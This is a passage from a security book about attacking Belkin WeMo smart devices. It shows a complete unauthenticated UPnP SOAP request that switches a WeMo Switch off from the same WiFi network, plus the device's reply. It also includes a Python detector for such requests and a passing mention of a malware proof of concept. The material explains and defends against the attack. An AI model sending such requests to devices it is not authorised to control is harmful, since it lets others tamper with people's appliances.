</device>
</root>
Notice the remoteaccess1 service. It is invoked similarly to the example listed for WeMo
Baby. However, there is an extra service here called basicevent1. It turns out that if the user is
on the same WiFi network as the Switch, it is possible to connect to this service and issue a
command to toggle the Switch:
POST /upnp/control/basicevent1 HTTP/1.1
SOAPACTION: "urn:Belkin:service:basicevent:1#SetBinaryState"
Content-Length: 316
Content-Type: text/xml; charset="utf-8"
HOST: 10.0.1.8:49153
User-Agent: CyberGarage-HTTP/1.0

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent:1">
<BinaryState>0</BinaryState>
</u:SetBinaryState>
</s:Body>
</s:Envelope>
The BinaryState value is set to 0, which commands the Switch to toggle to the off
position. The Switch responds:
HTTP/1.1 200 OK
CONTENT-LENGTH: 285
CONTENT-TYPE: text/xml; charset="utf-8"
DATE: Mon, 14 Oct 2013 10:58:26 GMT
EXT:
SERVER: Unspecified, UPnP/1.0, Unspecified
X-User-Agent: redsonic

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>
<u:SetBinaryStateResponse xmlns:u="urn:Belkin:service:basicevent:1">
<BinaryState>0</BinaryState>
</u:SetBinaryStateResponse>
</s:Body> </s:Envelope>
The HTTP OK response, along with the confirmation of the BinaryState value of 0,
indicates that the Switch was able to successfully turn off power to the connected appliance.
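A defender-side check for the exchange above, as an added example that is not part of the original text: it parses a captured HTTP request and reports SetBinaryState calls to basicevent1 that come from hosts outside an allow-list of known controllers. The function names, the allow-list, the source addresses and the sample capture are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

CONTROL_PATH = "/upnp/control/basicevent1"
ACTION = "urn:Belkin:service:basicevent:1#SetBinaryState"
NS = {"s": "http://schemas.xmlsoap.org/soap/envelope/",
      "u": "urn:Belkin:service:basicevent:1"}

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path = (request_line.split(" ") + ["", ""])[:2]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def requested_state(body):
    """Return the BinaryState text of a SetBinaryState body, or None."""
    if "<!doctype" in body.lower():  # refuse DTDs so no entities get expanded
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    return root.findtext("s:Body/u:SetBinaryState/BinaryState", namespaces=NS)

def inspect(src_ip, raw, allowed_controllers):
    """Alert on a SetBinaryState call from a host outside allowed_controllers."""
    method, path, headers, body = parse_request(raw)
    is_toggle = (method == "POST" and path == CONTROL_PATH and
                 headers.get("soapaction", "").strip('"') == ACTION)
    if not is_toggle or src_ip in allowed_controllers:
        return None
    return {"src": src_ip, "target": headers.get("host"),
            "state": requested_state(body)}

# Constructed capture, modelled on the request shown above.
SAMPLE = "\r\n".join([
    "POST /upnp/control/basicevent1 HTTP/1.1",
    'SOAPACTION: "urn:Belkin:service:basicevent:1#SetBinaryState"',
    "HOST: 10.0.1.8:49153",
    "",
    '<?xml version="1.0" encoding="utf-8"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent:1">'
    "<BinaryState>0</BinaryState></u:SetBinaryState></s:Body></s:Envelope>",
])
```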
Isaac Kelly has created a proof-of-concept toolkit in Python to test local access to the
WeMo Switch. For demonstration purposes, a simple malware script with local access can
CHAPTER 3: ASSAULTING THE RADIO NURSE—BREACHING BABY MONITORS AND ONE OTHER THING